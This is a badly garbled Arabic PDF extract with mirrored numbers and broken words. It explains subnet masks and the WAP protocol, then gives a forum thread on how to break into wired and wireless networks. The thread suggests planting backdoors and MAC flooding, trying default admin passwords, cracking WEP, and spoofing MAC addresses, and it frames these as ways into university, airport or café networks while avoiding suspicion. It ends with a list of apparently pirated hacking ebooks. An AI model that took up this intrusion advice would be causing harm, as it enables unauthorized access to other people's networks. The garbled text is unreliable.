‫ل توجد قواعد خاصة بالنسبة لتعیین معرفات المحطات (الجزء الخاص‬ ‫المحطة ضمن عنوان ‪ .(IP‬فیمكن مث ً تعیین المعرفات بشكل متتالي أو بشكل‬ ‫ل‬ ‫ل‪ ‬‬ ‫ل‬ ‫يسھل حفظه‪ .‬فمث ً‪ ::‬‬ ‫ل‪ ‬‬ ‫ل‬ ‫م‪ ‬‬ ‫‪ -1‬تقسیم معرفات المحطات إلى مجموعات حسب نوع الحاسب أو المخدم‬ ‫‪ -2‬تحديد المسیرات حسب عناوينھم‪ ‬‬ ‫‪ Subnet Mask‬‬ ‫‪S‬‬ ‫مفھوم قناع الشبكة الجزئیة‬ ‫يستخدم قناع الشبكة المؤلف من ‪ 23‬بت (مثله مثل عنوان ‪ (IP‬لتحقیق ماا‪ ‬‬ ‫يلي‪ :‬‬ ‫‪:‬‬ ‫ة‪ ‬‬ ‫‪ -1‬حجز قسم من عنوان ‪ IP‬للتمییز بین معرف الشبكة وبین معرف المحطة‬ ‫‪ -2‬التعبیر عن كون عنوان ‪ IP‬للمحطة الوجھة يقع على الشبكة المحلیة أوو‪ ‬‬ ‫بعیدة‪ .‬‬ ‫‪.‬‬ ‫على شبكة‬ ‫ن‪ ‬‬ ‫يجب تعیین قناع شبكة لكل محطة مستخدمة لبروتوكولت ‪ .TCP/IP‬يمكن أن‬ ‫شبكات‪ ‬‬ ‫ت‬ ‫يأخذ ھ ذا القناع القیمة الفتراضیة عندما ل تكون الشبكة مجزأة إلى‬ ‫الجزئیة‪ .‬‬ ‫‪.‬‬ ‫جزئیة أو أي قیمة معرفة من قبل المستثمر في حال وجود الشبكات‬ ‫الفتراضي‪ ‬‬ ‫ي‬ ‫قناع الشبكة الجزئیة‬ ‫ى‪ ‬‬ ‫يستخدم قناع الشبكة الفتراضي في شبكات ‪ TCP/IP‬غیر المجزأة إلى‬ ‫على‪ ‬‬ ‫شبكات جزئیة‪ .‬يجب تعريف قناع الشبكة لدى جمیع المحطات الموجودة ى‬ ‫الشبكة‪ .‬‬ ‫‪.‬‬ ‫الشبكة‪ .‬ھ ذا ويتعلق القناع الفتراضي بصف‬ ‫ة‪ ‬‬ ‫تأخذ جمیع البتات الموافقة لمعرف الشبكة القیمة "‪ "1‬أي أن القیمة العشرية‬ ‫ف‪ ‬‬ ‫لكل بايت تكون مساوية للقیمة "‪ ."552‬بینما تأخذ البتات الموافقة لمعرف‬ ‫"‪ .‬‬ ‫المحطة القیمة "‪. 0‬‬ ‫ما‪ ‬‬ ‫طريقة تحديد وجھة طرد ا‬ ‫ى‪ ‬‬ ‫يتم استخدام “‪ ”AND‬للتفرقة بین الطرود الموجھة إلى محطة محلیة (على‬ ‫‪ 151‬‬


‫بعیدة‪ .‬‬ ‫‪.‬‬ ‫نفس الشبكة الفیزيائیة) أو إلى محطة‬ ‫ع‪ ‬‬ ‫‪ -1‬عند إعداد ‪ ،TCP/IP‬تتم عملیة “‪ ”AND‬بین عنوان ‪ IP‬للمحطة وبین قناع‬ ‫ا‪ .‬‬ ‫الشبكة المعرف لھ ‪.‬‬ ‫ع‪ ‬‬ ‫‪ -2‬قبل إرسال أي طرد تتم عملیة “‪ ”AND‬بین عنوان ‪ IP‬للوجھة وبین قناع‬ ‫المحلي‪ .‬‬ ‫‪.‬‬ ‫الشبكة‬ ‫إذا تساوت نتائج المرحلة (‪ )1‬مع نتائج المرحلة (‪ )2‬فھذا يعني أن الطرد موجه‬ ‫ه‬ ‫موجه‪ ‬‬ ‫ه‬ ‫إلى محطة محلیة وإل فیتم إرسال الطرد إلى العبارة الفتراضیة (الطرد‬ ‫بعیدة)‪ .‬‬ ‫‪.‬‬ ‫إلى محطة‬ ‫ع‪ ‬‬ ‫تتم عملیة “‪ ”AND‬بمقارنة كل بت من عنوان ‪ IP‬مع البت المقابل في قناع‬ ‫الشبكة‪ .‬فإذا أخذ البتان القیمة "‪ "1‬فتكون النتیجة "‪ "1‬وإل فالنتیجة تكون "‪. 0‬‬ ‫"‪.‬‬ ‫‪ ...‬‬ ‫انتھـــــــى ‪.‬‬ ‫‪ 251‬‬ ‫‪ (WAP‬‬ ‫(‬ ‫بروتوكول الستخدام اللسلكي (‬ ‫اللسلكي‪ ‬‬ ‫ي‬ ‫بروتوكول الستخدام‬ ‫‪ Wireless application protocol‬‬ ‫‪ )(WAP‬‬ ‫أو‪ ‬‬ ‫ل تستبعد إذا قلنا لك بأن بإمكانك أن تحجز تذكرتك أو أن ترى فیلم فیديو و‬ ‫ترسل‪ ‬‬ ‫ل‬ ‫تتعرف على آخر الخبار وتري تطورات السوق وتشتري وتبیع أسھمك أو‬ ‫ذا‪ ‬‬ ‫وتستقبل رسائل الكترونیة وغیرھ ا من المور المختلفة على النترنت‪...‬كل ھ ا‬ ‫كبیر‪ ‬‬ ‫وأنت تسیر متمشیا في الشارع‪ .‬نعم إن ذلك قد أصبح حقیقة إلى حد ر‬ ‫برنامج‪ ‬‬ ‫ج‬ ‫وذلك باستخدام التلفون المحمول " الموبايل" إذا كان محتويا على‬ ‫"واب"‪ .‬‬ ‫‪.‬‬ ‫واب ‪ WAP‬بدأنا نسمع به منذ أشھ ر قلیلة‪ ،‬والن ل يكاد أحد لم يسمع به‪ .‬ومنذ‬ ‫ذ‬ ‫كمبیوتر‪ ‬‬ ‫ر‬ ‫أن بدأ استخدامه كبرنامج داخل التلفون النقال‪ ،‬فقد أصبح وكأن لديك‬ ‫جیبك‪ .‬‬ ‫‪.‬‬ ‫داخل‬ ‫ن‪ ‬‬ ‫يعتقد المحللون بإنه بعد أقل من خمس سنوات فإن ‪ 072‬ملیون أوربي سیكون‬ ‫ت‪ ‬‬ ‫لديھم تلفونات نقالة‪ ،‬وأن حوالي ‪ %07‬من ھؤلء سیستعملون التلفونات‬ ‫المعتمدة على خدمة ‪ WAP‬للوصول إلى النترنت‪ .‬بل يعتقد الباحثون بأنه ما أن‬ ‫ن‬ ‫ع‪ ‬‬ ‫نصل لسنة ‪ 3002‬حتى يكون الناس الذين يمتلكون تلفونات نقالة متلئمة مع‬ ‫ة‪ ‬‬ ‫الواب ‪ WAP compatible phones‬ھ م أكثر عددا من الذين يمتلكون أجھزة‬ ‫كمبیوتر!‪ .‬‬ ‫‪.‬‬ ‫إذن ما ھو الواب ‪WAP‬؟‪ ‬‬ ‫ة‪ ‬‬ ‫‪ WAP‬أو ‪ Wireless application protocol‬عبارة عن بیئة استخدام ومجموعة‬ ‫معیارية‪ ‬‬ ‫ة‬ ‫قواعد اتصال خاصة بأجھزة التصال اللسلكیة‪ ،‬تم تصمیمھا بمواصفات‬ ‫زة‪ ‬‬ ‫من أجل توحید أسلوب عمل معدات التصال مثل التلفون النقال والجھ ة‬ ‫ذلك‪ ‬‬ ‫المرسلة والمستقبلة من حیث إمكانیتھ ا الوصول إلى النترنت بما في ك‬ ‫المعلومات‪ ‬‬ ‫ت‬ ‫البريد اللكتروني والشبكة العنكبوتیة ومجموعات الخبار وخدمات‬ ‫والشراء‪ ‬‬ ‫ء‬ ‫المختلفة ووسائل التسلیة والثقافة وأعمال البنوك والسھم والتجارة‬ ‫ا‪ .‬‬ ‫عبر النترنت ومعرفة الحوال الجوية وغیرھ ‪.‬‬ ‫‪ 351‬‬ ‫‪Wireless application protocol‬تعني بروتوكول الستخدام اللسلكي‪ ،،‬‬ ‫قواعد‪ ‬‬ ‫د‬ ‫وبالنسبة لتكنولوجیا المعلومات فإن كلمة بروتوكول عبارة عن مجموعة‬ ‫على‪ ‬‬ ‫ونظم خاصة تحكم عملیة التفاھم بین نقاط التصال النھائیة الموجودة ى‬ ‫شبكة التصالت‪ ،‬وذلك عندما تقوم تلك النقاط بإرسال واستقبال الشارات فیماا‬ ‫أن‪ ‬‬ ‫بینھا‪ .‬إن كل نقطة نھ ائیة يجب أن تتعرف على وتراقب تلك القواعد‪ .‬والعادة ن‬ ‫به‪ .‬‬ ‫تكون تلك القواعد معیارية في المجال الذي تعمل ‪.‬‬ ‫أساسه‪ ‬‬ ‫ه‬ ‫وقد أصبح ھذا البروتوكول الن ھو المعیار القیاسي الذي يعمل على‬ ‫‪ Mobile‬‬ ‫‪M‬‬ ‫صانعي أنظمة التصال اللسلكیة المستخدمة مثل التلفون النقال‬ ‫ة‪ Personal Digital ‬‬ ‫‪ Phones‬والجھزة الرقمیة الشخصیة المساعدة‬ ‫ة‪ ‬‬ ‫‪ Assistants (PDAs‬وراديو السیارات ‪ Car Radios‬وأجھزة البحث اللسلكیة‬


‫ي‪ ‬‬ ‫الخرى ‪ Navigation Systems‬وغیرھا من الجھزة الخرى والتي ھي الن في‬ ‫التطوير‪ .‬‬ ‫‪.‬‬ ‫مراحل‬ ‫إن المواصفات المعیارية لھذا النظام ھي مواصفات دولیة‪ ،‬ومفتوحة بشكل تكون‬ ‫ن‬ ‫إعطاء‪ ‬‬ ‫ء‬ ‫فیه متاحه للجمیع من صانعین ومطورين ومستخدمین‪ ،‬وذلك من أجل‬ ‫الخدمات‪ ‬‬ ‫ت‬ ‫مستخدمي أجھزة التلفون النقال إمكانیات أكبر وأقوى للتعامل مع‬ ‫الحركة‪ ‬‬ ‫ة‬ ‫والمعلومات بشكل فوري‪ .‬كما أضاف ھ ذا البروتوكول للنترنت إمكانیة‬ ‫الوصول‪ ‬‬ ‫ل‬ ‫والنتشار الوسع‪ ،‬ويتم العمل على أن يجعل مالكي ھذا النظام‬ ‫وأفضل‪ .‬‬ ‫‪.‬‬ ‫والبحث في النترنت أسھل‬ ‫لكل‪ ‬‬ ‫ومع أن الوصول للنترنت بھذه الجھزة كان ممكننا في الماضي‪ ،‬حیث كان ل‬ ‫المختلفة‪ ‬‬ ‫ة‬ ‫من المصنعین تقنیته الخاصة به‪ ،‬إل أنه في المستقبل فإن المعدات‬ ‫ع‪ ‬‬ ‫الصنع‪ ،‬والتي تستعمل ‪ WAP‬سیكون بإمكانھا التفاھم مع بعضھا والتعامل مع‬ ‫النترنت‪ ‬‬ ‫ت‬ ‫الواب‪ ‬‬ ‫ب‬ ‫مجلس مجموعة‬ ‫‪ WAP Forum‬‬ ‫ونوكیا‪ ‬‬ ‫ا‬ ‫أوجد ھ ذا البروتوكول مجموعة من الشركات ھي إيريكسون ‪Ericsson‬‬ ‫‪ Nokia‬وموتورول ‪ Motorola‬بالضافة إلى شركة برامج أقل شھرة ھي أنوايردد‪ ‬‬ ‫‪ .Phone.com‬‬ ‫‪.‬‬ ‫بلنیت ‪ ،Unwired Planet‬والتي أسمت نفسھا بعد ذلك بإسم‬ ‫س‪ ‬‬ ‫وقد تم ذلك في صیف ‪ ،7991‬حیث تكون من أجل ذلك ما إسمي بمجلس‬ ‫ض‪ ‬‬ ‫مجموعة الواب ‪ (The WAP forum (www.wapforum.org‬وكان الغرض‬ ‫‪ 451‬‬ ‫الساسي منه ھ و من أجل تحديد إيجاد قوة ضغط تستطیع وضع مواصفات عامة‬ ‫ة‬ ‫وأن‪ ‬‬ ‫لھ ذه الصناعة وذلك لتطوير الستخدامات عبر شبكات التصالت اللسلكیة‪ ،‬ن‬ ‫ل يتم إحتكار ذلك تجاريا‪ .‬بالضافة إلى أن من أھدافه ھو جمع وإحضار الشركات‬ ‫ت‬ ‫توحید‪ ‬‬ ‫د‬ ‫العاملة في كافة مجالت أعمال الصناعات اللسلكیة للتأكید على‬ ‫فإن‪ ‬‬ ‫مواصفاتھا بالتقید يقواعد ھ ذا البروتوكول‪ .‬وكما في بروتوكول النترنت ن‬ ‫بالضافة‪ ‬‬ ‫ة‬ ‫بروتوكول الستخدام اللسلكي يتمیز بأنه بروتوكول معیاري عالمي‪.‬‬ ‫أصبح‪ ‬‬ ‫ح‬ ‫إلى أن ملكیته وإمكانیة التحكم به ل تعود لحد أو لية شركة‪ .‬والن فقد‬ ‫عدد أعضائه عدة مئات من الشركات من كافة الصناعات التي يتصل عملھاا‪ ‬‬ ‫حلول‪ ‬‬ ‫ل‬ ‫بالنترنت مثل مزودي الخدمة ومصممي البرامج والمنظمات التي تعطي‬ ‫م‪ ‬‬ ‫خاصة في مجال التصالت اللسلكیة‪ .‬كما أن من ضمن أعضائه من ھم‬ ‫م‪ ‬‬ ‫مسئولین عن أكثر من ‪ %09‬من العاملین في مجال التلفون النقال في العالم‬ ‫مشترك‪ .‬‬ ‫‪.‬‬ ‫أجمع‪ ،‬والذين لديھ م أكثر من مئة ملیون‬ ‫‪ 551‬‬ ‫اللسلكیة‪ ‬‬ ‫ة‬ ‫الشبكات‬ ‫‪ Slacker‬‬ ‫‪S‬‬ ‫للكاتب‪:‬‬ ‫مناقشة‪ :‬‬ ‫‪:‬‬ ‫اوضحلك‪ ‬‬ ‫ك‬ ‫بس على العموم حتى لاكون اجیب لكم من دون ادلة ‪...‬خلیني‬ ‫التناقض‪ ‬‬ ‫ض‬ ‫شوف‬ ‫حقیقه ااختراق الشبكات من المواضیع المھمه جداا اللي غالبا ماتجد لھاا‪ ‬‬ ‫موضوع ايتكلم عنھاا‪ ‬‬ ‫كانت‪ ‬‬ ‫وانا شايف الكل يبي يعرف كیف يتم اخترااق الشبكات او الشبكه سواء ت‬ ‫وايرلس‪ ‬‬ ‫س‬ ‫واير او‬ ‫اخر‪ ‬‬ ‫يعني اغلبنا يكون يستخدم كمبیوتر في جـامعه مثل ويبي يوصل لكمبیوتر ر‬ ‫الدمنستور‪ ‬‬ ‫ر‬ ‫او كمبیوتر‬ ‫مطاااار!!!‪ ‬‬ ‫!‬ ‫او في مقھ ى انترنت او حتى في سوق او‬ ‫اسمه‪ ‬‬ ‫ه‬ ‫اخي العزيز في ھذا المنتدى ولیس في غیره طرح كتاب‬ ‫ى‪ ‬‬ ‫‪Stealing.the.Network.How.to.Own.the.Box‬اعتقد انه عندك ‪...‬في احدى‬ ‫قصصه يشرح كیف انه كان جالسا في المطار وكیف اخترق شبكة لسلكیة ‪...‬‬ ‫‪ ...‬‬ ‫والطريقة واقعیة جدا لتنقصل سوى خبرة ‪.‬‬ ‫العموم‪ ‬‬ ‫م‬ ‫اذن الطرق موجودة والدوات موجودة لكن نحن مانريد نشتغل ‪...‬على‬


‫‪ ...‬‬ ‫‪...‬بعض النقاط اشرحھا بايجاز ‪.‬‬ ‫سواء‪ ‬‬ ‫ء‬ ‫الشبكات سواء كانت سلكیة او لسلكیة يجب ان تكون عنوان ممیز‬ ‫دومین او رقم ‪IP‬لعملیات المسح ‪ ...‬‬ ‫لم‪ ‬‬ ‫في حال الشبكة لسلكیة عند اختراقك لھا يجب ان تكون عغضو فیھا ان م‬ ‫تكون موصولة بالنترنت وفي حال كانت موصولة وقتھ ا لتسمى شبكة تسمى‬ ‫ى‬ ‫اااااااامة‪ ‬‬ ‫ة‬ ‫انترانت ھي نقطة ھ‬ ‫كانت‪ ‬‬ ‫الن الشبكات السلكیة سواء كنت عضو فیھا او لم تكن عضو او سواء ت‬ ‫‪ ,,,,‬‬ ‫موصولة بالنترنت او لم تكن باستطاعتك اختراقھا ‪,‬‬ ‫ز‪ ‬‬ ‫الشبكة السلكیة لنتلكم في حال كنت عضو فیھا ‪..‬اكید حیكون الجاھز‬ ‫الساسي الي ھو الـ ‪Server‬اتكلم عن الشبكات الحقیقیة ولیس ‪ P2P‬ي‬ ‫يعني‬ ‫الي تعتمد مبدا ‪ Client/Server‬بشكل فعلي ولیس شكلي تتراوح الطرق من‬ ‫ن‬ ‫السھ ولة حیث ان تمكنت من الجلوس علیه لفترة بامكانك زرع باكدوور او حتى‬ ‫ى‬ ‫م‪ ‬‬ ‫انك تعمل ھجوم ‪Mac Flood‬او مايسمى ‪MacOF Attacking‬وعندك ھجوم‬ ‫بالنجلیزي‪ ‬‬ ‫ي‬ ‫القوة العنیفة ناسي شلون نتكتب‬ ‫‪ 651‬‬ ‫طبعا الن تتجه اغلب الشركات الى الشبكات السلكیة وھنا مربط الفرس حیث‬ ‫ث‬ ‫الغالي‪ ‬‬ ‫ي‬ ‫لھا مستقبل حتى في وطننا العربي‬ ‫حیث تم الن وفي مصر انشاء بعض النقاط الساخنة الي اذا وقفت علیھا تحرقك‬ ‫ك‬ ‫قصدي نقاط اتصال ‪Hot Spot‬لكي تتصل بالنترنت وانت تاكل الھامبرجرمن عند‬ ‫د‬ ‫انیابك‪ ‬‬ ‫ك‬ ‫ماكدونالد وانت رافع العلم المريكي ومكشر عن‬ ‫مثل‪ ‬‬ ‫او حتى وانت في الحمام عم تعمل دوش ساخن والبتوب بین رجلیك ل‬ ‫المھم ھذه نقاط التصال وايضا تقنیة ‪ Voice Over IP‬الي اذا استعملھا‪ ‬‬ ‫وتقنیة‪ ‬‬ ‫ة‬ ‫السوريین سوف يتعرضون للحبس والمخالفات المالیة‬ ‫ة‪ ‬‬ ‫‪Wi­Fi‬لاعرف ان كانت كلمة تقنیة جیدة‬ ‫لسلكي‪ ‬‬ ‫ي‬ ‫المھم كلھا تعمد على انو يكون في جھازك كرت شبكة‬ ‫یة‪ ‬‬ ‫الن بابسط الشكال لكي تخترق مثل ھ ذه الشبكة يجب توفر امور بديھ ة‬ ‫ب‪ ‬‬ ‫‪1‬جھاز لبتوب‬‫ي‪ ‬‬ ‫‪2‬كرت شبكة لسلكي‬‫ة‪ ‬‬ ‫‪3‬ان تكون بمجال تردد الشبكة‬‫ي‪ ‬‬ ‫‪4‬لقط الشارة اختیاري‬‫السلكیة‪ ‬‬ ‫ة‬ ‫ديجب مراعاة عدة امور في اختراق الشبكات‬ ‫ان تاخذ ركن ماحد يشك فیك يقوموا بفكروك ارھابي بتاع تفجیرات جدة او حتى‬ ‫ى‬ ‫ادي‪ ‬‬ ‫لبنان يعني خذلك مكان ھ ي‬ ‫مثل‪ ‬‬ ‫استعمل برامج ل‬ ‫<‪netstumbler <http://www.netstumbler.com /‬لويندوز و‪ ‬‬ ‫ه‪ ‬‬ ‫‪Wellenreiter‬لنظمة لینكس واخواته‬ ‫الى‪ ‬‬ ‫ويجب علیك النتباه ى‬ ‫‪1‬كلمة السر الفتراضیة للبشبكة تاتي عادة ‪Admin‬في حال لقطت شبكة من‬‫ن‬ ‫سر‪ ‬‬ ‫الممكن يكونوا مغیرينھ ا ومن الممكن ل ومن الممكن ماتجد كلمة ر‬ ‫ت‪ ‬‬ ‫‪2‬تشفیر البیانات تتبع الشبكة السلكیة طرق تشفیر يعني ممكن ان تتنصت‬‫البیانات‪ ‬‬ ‫ت‬ ‫على المعلومات وتعرف تردد الشبكة وكل ھذه المور بس تصلك‬ ‫ماعتقد‪ ‬‬ ‫د‬ ‫مشفرة ‪..‬والتقنیة اسمھا علىل‬ ‫‪ packetstormsecurity‬‬ ‫‪p‬‬ ‫‪Wired Equivalent Privacy‬وھناك اداوت تجده في‬ ‫ز‪ ‬‬ ‫<‪<http://packetstormsecurity.nl /‬لكسر ھذه الترامیز‬ ‫ن‪ ‬‬ ‫‪4‬فلترة العناوين‬‫بطل قصة كتاب ‪Stealing.the.Network.How.to.Own.a.Continent‬مات بسب‬ ‫ب‬ ‫‪ MAC Address‬‬ ‫‪M‬‬ ‫نسیانه تزوير عناوين‬ ‫‪ 751‬‬ ‫يعني‪ ‬‬ ‫اعتقد انه ھناك اخوة في ھ ذا المنتدى قد طرحوا مواضیع ووضحوا ماذا ي‬ ‫‪ MAC Address‬‬


‫المھ م لكل كرت شبكة عنوان ممیز بوضعه الشركة المصنعة للكرت وھو عناون‪ ‬‬ ‫فیزيائي ولیس ھناك مجال للتطابق الرقام نھائیا وا حتى تكرارھا وكما ھو‪ ‬‬ ‫معروف فان نقطة التصال في مكونات الـ ‪ OSI Model‬للشبكات للمزيد اقرا‪ ‬‬ ‫وثائق ‪ RFC‬تعامل مع الـ ‪MAC Address‬ولیس الـ ‪ IP‬فمن ھنا من الممكن ان‪ ‬‬ ‫تحدد مجموعة المستخدمین في شبكتك وتمنع اي اتصال اخر من اي عنوان‪ ‬‬ ‫غیر محدد‪ ‬‬ ‫تدعي ھذه الطريق بـ ‪Deny ALL, Allow some‬ولنفرض انت قدرت تحدد ‪ MAC‬‬ ‫‪ Address‬بتاع الشبكة بتزوير للباكیت المرسلة تكون كعضو موثوق‪ ‬‬ ‫ ‪5‬معرف الخدمة او الـ ‪ SSID‬‬‫اختصارا لـ ال ‪Service Set Identifier‬او معرف الخدمة كل نقطة اتصال لھا ‪SSID‬‬ ‫معین ويكون معروف من جھ ة مستخدمي الشبكة والفائدة منه ھي انني‪ ‬‬ ‫ولنفرض لست بمقر الشركة ولكنني ضمن نطاق مجال الشبكة موجود فیه‪ ‬‬ ‫بامكاني عن طريق احد برمجیات الشكبات التصال ووالتعريف عن نفسي عن‪ ‬‬ ‫طريق الـ ‪ SSID‬‬ ‫ولكن المشكلة ان ھذا الـ ‪ SSID‬ياتي احیانا بشكل افتراضي وينسى مدير‪ ‬‬ ‫الشبكة تغییرة وتكون عرضة لختراقات وھناك طريقة اخرى للحماية وھي تقلیل‬ ‫نسبة الرسال او الطیف التابع للشبكة السكلیة وبذلك بالمكان تحديدھا‪ ‬‬ ‫بحیث لتتخطى حدود شركتك او منزلك‪ ‬‬ ‫اعرف اني قد اكون مافدتك زيادة بس صدفني انا تركت المر لقلك مثل التعلم‪ ‬‬ ‫الذاتي ليوجد يعني المعلومة ترسخ وتظل لبد ‪ ..‬‬ ‫المھ م بعض الكتب التي تفیدك كثیرا في ھ ذا المجاااااااااااااااااااااااااااال‪ ‬‬ ‫‪ O'Reilly.­.Network.Security.Hacks.chm‬‬ ‫‪ Syngress.Hack.Proofing.Your.Network,Second.edition .pdf‬‬ ‫‪ Mcgraw.Hill.Hacknotes.Network.Security.Portable.Re ference.DDU.pdf‬‬ ‫‪ ­McGraw­Hill_­_Wi‬‬ ‫‪ Fi_Handbook._Building_802.11b_Wireless_Netw.chm‬‬ ‫‪ Syngress.WarDriving.Drive.Detect.Defend.A.Guide.to‬‬ ‫‪ .Wireless.Security.Apr.2004­DDU.chm‬‬ ‫‪ Addison Wesley ­ Wireless Security and Privacy ­ Best Practi.chm‬‬ ‫‪ ­Syngress.Wireless.Hacking.Projects.for.Wi‬‬ ‫‪ Fi.Enthusiasts.Oct.2004.eBook­DDU.pdf‬‬ ‫‪ Addison.Wesley.Real.802.11.Security.Wi­Fi.Protected.Access.A.chm‬‬ ‫‪ 851‬‬ ‫‪ OReilly ­ Wireless Hacks ­ 2003.chm‬‬ ‫‪ Syngress.Hacking.a.Terror.Network.Nov.2004.eBook­DDU.pdf‬‬ ‫‪ Syngress.­.Stealing.the.Network.How.to.Own.the.Box.pdf‬‬ ‫‪ Syngress.Publishing.Stealing.the.Network.How.to.Ow‬‬ ‫‪ n.a.Continent.eBook­LiB.chm‬‬ ‫صدقني لو كنت املك اتصال سريع بالنترنت لرفعتكلم كل ھذه الكتب ولكن اذا‪ ‬‬ ‫اردت ذلك ‪ ...‬‬ ‫يعني تقدر تحملھم مثل ھ ل الوقت بعد خمسین سنة ‪.....‬وبعدين ماعندي‪ ‬‬ ‫مساحة‪ ‬‬ ‫انت اطلب من الشباب واكید مايقصروا‪ ‬‬ ‫مصطلحات‪ :‬‬ ‫الشبكة السلكیة تعمل مثلھ ا مثل الشبكة العتیادية لكن يمیزھا ان تعمل‪ ‬‬ ‫بدون الكابلت على تردد ما يقاس بالھرت‪ .‬‬ ‫الن لتبسیط الفكرة انظر الى الراديو او الى الستليت تلقیھا نفس الفكرة ‪ ..‬‬ ‫تصور حتى تجیك قناة واحدة يمدوا كبل من مركز البث الى بیتك ‪ .‬تفكیر جمیل‪ ‬‬ ‫الن المستلزماااااات‪ ‬‬ ‫جھاز ‪ PC‬‬


‫ض‪ ‬‬ ‫كرت شبكة لسلكي ‪..‬انصحك بكرت الشبكة ‪ORiNOCO‬على زعم بعض‬ ‫باختراق‪ ‬‬ ‫ق‬ ‫الھ اكر يقولون انه الفضل في التعامل مع برمجیات الھاكر المتعلقة‬ ‫كويس‪ ‬‬ ‫س‬ ‫الشبكات السلكي يعني بالعامیة يلقط بشكل‬ ‫ر‪ ‬‬ ‫ھناك اختیارت اخرى امثال ‪: Cisco ,, D­Link‬وغیرھا الكثر‬ ‫‪ ..‬‬ ‫لقط اشارة او بالعامي انطین ‪.‬‬ ‫‪ ÇäØíä ÕäÚ íÏá‬‬ ‫‪Ç‬‬ ‫اذا اردت عمله بنفسك راجع ھذه الوصلة‬ ‫‪ >844/<http://www.oreillynet.com/cs/weblog/view/wlg‬‬ ‫ع‪ ‬‬ ‫يجب عند شرائك النطین مراعاة ‪dB‬معدل خسارة الشارة المتلقطة تحدد مع‬ ‫بیاع‪ ‬‬ ‫كل انطین ع‬ ‫الن كل ماكان الـ ‪dBi‬وھي نسبة كسب الشارة فكلما كان ‪dBi‬اكبر كان افضل‬ ‫ل‬ ‫‪...‬يعني‪ ‬‬ ‫ي‬ ‫الفكرة‪ ‬‬ ‫ة‬ ‫شوف الصورة التیة لكي تفھم‬ ‫‪ 951‬‬ ‫‪ ...‬‬ ‫الن اختبر كرت الشبكة عندك ‪.‬‬ ‫التیة‪ ‬‬ ‫ة‬ ‫نقطة ھ امة حاول عندما شرائك كرت الشبكة ان تعرف عنه المعلومات‬ ‫افضل‪ ‬‬ ‫ل‬ ‫ھ ل بامكني ان اركب له النطین ھل يقبل وھ یك امور ‪...‬وانا اعطیتكم‬ ‫اكر‪ ‬‬ ‫نوعیة على قولة شباب الھ ر‬ ‫‪ ...‬‬ ‫الن لوك نعرف انه للشبكة السلكیة عدة انماط ‪.‬‬ ‫‪1‬الشبكة المفتوحة التي ليتوفر لھا اي حماية يعني للعوام ربما تكون عن قصد‬‫د‬ ‫كبعض خدمات الـ ‪HotSpot‬وربما عن غباءء‪ ‬‬ ‫ن‪ ‬‬ ‫‪2‬الشبكة المغلقة يعني الدخول لھا محدد لعضاء الشبكة الفعلیین‬‫‪3‬الشبكة المغلقة مع التشفیر ‪WEP encryption‬يعني تاتي المعطیات فیھا‪ ‬‬‫‪ ..‬‬ ‫مشفرة عند الرسال ‪.‬‬ ‫جدا‪ ‬‬ ‫جمیل ا‬ ‫الشبكه‪ ‬‬ ‫ه‬ ‫حبیت اضیف نقطه اخرى بالنسبه لكروت‬ ‫داخلي‪ ‬‬ ‫ي‬ ‫ھ ناك كرت غالي الثمن "جدا "من شركة ثري كوم وھ و مدمج مع انتن‬ ‫ومن مزاياه انه يدعم انواع الشبكات اللسلكیه الثلثه ‪a/b/g‬وسعره في حدودد‪ ‬‬ ‫ي‪ ‬‬ ‫ال ‪052‬دولر "كان معاي واحد منه اعطاني اياه صديق عزيزي علي وھو اخي‬ ‫‪guy from 70‬لكن لما شريت الجھ از الجديد قللي فیه وايرلس بلت ان قلت ايه‬ ‫ه‬ ‫علي‪ ‬‬ ‫قام صادره ي‬ ‫م‪ ‬‬ ‫ونوعیة كروت انتل ‪2200bg‬من وجھة نظري اشوفھا رائعه والفرق انھا ماتدعم‬ ‫البروتوكول القديم ‪a‬وما اظن اننا بحاجه له اغلب الھوتسبوتس تستخدم ‪ b‬‬ ‫واللي معاه قروش زياده يشتري الجھاز تبع ‪g‬والفرق بسیط""‪ ‬‬ ‫شكرا لك اخوي سلكر على فتحك الموضوع وان شاء االله بنتناقش فیه ونوسعه‬ ‫ه‬ ‫‪ 061‬‬ ‫المكان‪ ‬‬ ‫ن‬ ‫بقدر‬ ‫البرنجلز"‪ ‬‬ ‫"‬ ‫وعجبني جدا النتن اللي من علبة‬ ‫شي‪ ‬‬ ‫على فكره حبیت استفسر عن ي‬ ‫لما كنت ادخل النترنت من بیت زمیلنا سوبر لینكس كنت كل ما ابعد عن ""‪ ‬‬ ‫كانت‪ ‬‬ ‫صندوق الزباله "االله يكرمكم كانت الشاره تضعف ولكن كل ما قربنا ت‬ ‫بوينت‪ ‬‬ ‫ت‬ ‫الشاره تزداد مع العلم اني واقف على خط متوازي من مكان الكسس‬ ‫الرسال‪ ‬‬ ‫ل‬ ‫تظن انه صندوق الزباله "االله يكرمكم "يزيد‬ ‫الدوات‪ :‬‬ ‫‪:‬‬ ‫‪ ..‬‬ ‫نكمل الن ‪.‬‬ ‫ماعتقد‪ ‬‬ ‫د‬ ‫تحتاج عند اختراقك لشبكة ما الى ادوات كلمي صحیح على‬ ‫‪ Scan‬‬ ‫ت ‪S‬‬ ‫نبدا الن باالمسحات الماسحات‬ ‫‪ Windows <http://www.microsoft.com‬‬ ‫‪W‬‬ ‫‪1‬لمستخدمي <‪/‬‬‫‪n‬‬ ‫‪netstumbler <http://www.netstumbler.com‬‬ ‫وفرت لنا اداة عظیمة وقوية <‪/‬‬ ‫لداة‪ ‬‬ ‫ة‬ ‫صورة‬ ‫‪ ..‬‬ ‫ھنا والداة تعمل ولقطة عدد من الشبكات ‪.‬‬


‫الدة‪ ‬‬ ‫ة‬ ‫ناتي الن الى فھم بعض الماعني والرمزر في ھذه‬ ‫ذه‪ ‬‬ ‫اول نلحظ ان الشبكات يرمز لھا برمز دائرة لونھا رمادي ‪..‬الن لناخذ ھ ه‬ ‫الشبكة‪ ‬‬ ‫ة‬ ‫المعلومة ان اللون الرمادي ھو ھو عبارة عن لقط اشارة‬ ‫اما اذا كان اللون برتقالي فھ ذا عبارة عن اشارة جیدة جدا اما اذا كان صفراء فیه‬ ‫ه‬ ‫‪ ..‬‬ ‫تعني جیدة اما اذا كانت خضراء فھي تعني اشارة ممتازة ‪.‬‬ ‫على الغلب لن تحصل على اللون ال اذا كنت داخل نطاق الشبكة بمعدل جید‬ ‫د‬ ‫الرمادي‪ ‬‬ ‫ي‬ ‫جدا اما اذا كنت خارج نطاق المكان فلن تحصل الى على اللون‬ ‫ذه‪ ‬‬ ‫نلحظ الن بان بعض الدوائر يوجد بداخلھا رمز القفل ھذا يعني على ان ھ ه‬ ‫‪ 161‬‬ ‫الول‪ 